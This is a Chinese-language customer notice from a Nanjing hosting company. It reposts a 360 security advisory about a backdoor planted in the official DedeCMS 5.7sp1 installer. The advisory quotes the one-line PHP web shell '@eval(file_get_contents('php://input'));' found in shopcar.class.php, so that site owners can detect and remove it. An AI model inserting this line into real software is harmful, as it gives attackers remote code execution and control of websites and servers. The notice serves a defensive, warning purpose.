首页 >> 最新公告 >> 详细内容
提醒:关于织梦系统DedeCMS被黑客植入木马

尊敬的中绘谷用户:
您好!

日前,织梦内容管理系统(DedeCMS)5.7sp1官方安装包被曝遭植入后门,黑客可通过此后门直接获得网站的控制权限,获取存储在服务器上的文件和数据库。

中绘谷数据提醒广大织梦系统网站用户,及时更新织梦内容管理系统(DedeCMS)版本,并对网站程序进行检测,以避免遭受损失。

转:DedeCMS官方版本惊曝后门 360WebScan可检测

日前,织梦内容管理系统(DedeCMS)遭乌云漏洞平台曝光称,DedeCMS 5.7sp1官方安装包被黑客植入后门。经360安全检测平台检测,该后门确实曾一度出现在织梦官网版本中。为此,360于当天紧急推出DedeCMS后门检测服务,并已对大批中招网站发出邮件报警。

   360网站安全检测平台服务网址:http://webscan.360.cn



   据悉,DedeCMS正广泛应用于众多企业网站、政府网站、高校网站及个人网站上,是国内用户量最大的PHP类CMS系统。360安全工程师分析发现,此次DedeCMS曝出的后门名为“一句话后门”,其恶意代码存在于DedeCMS购物车类文件中,凡是调用该购物车类的文件均会触发后门,从而导致整个网站甚至服务器遭黑客进一步控制。

   360建议,使用DedeCMS的网站站长应立刻检测include/shopcar.class.php文件中是否存在后门代码“@eval(file_get_contents('php://input'));”,如存在应将其删除,如不存在则证明没有该“一句话后门”。

   作为开源软件,DedeCMS此次曝出后门并非个例。因为在国际上,Linux等多款著名的开源软件也曾遭黑客植入后门。不过,乌云漏洞平台公开的织梦官方邮件显示,织梦开发团队否认了产品曾被植入后门,但其官网上的DedeCMS版本在3月21日中午悄然进行了修改。


                                                            南京中绘谷网络技术有限公司

南京服务器托管 | 南京服务器租用 | 南京网站建设 | 南京企业建站 | 南京服务器代维 | 虚拟主机 | 顶级域名 | 网站优化 | 网站推广 | 南京中绘谷网络数据中心467.cn
| 整理发布 | TEL:13913852884,025-58633651,QQ:21390019 

发布者:admin 发布时间:2012-4-3 阅读:2189

Baidu
Copyright © 2002-2018 467.Cn All rights reserved    南京华昊网络技术有限公司    版权所有
备案序号:苏ICP备13052121号    ISP经营许可证:苏B2-20080166    ICP/SP经营许可证:苏B2-20130350      苏公网安备 32011102010099号
地址:南京市江北新区大桥北路77号电信大楼5楼    电话:025-58633651(8线)  传真:025-58497310    E-mail:467cn@163.com    邮编:210032
网址:Www.467.Cn    QQ在线支持:点击这里给我发消息 点击这里给我发消息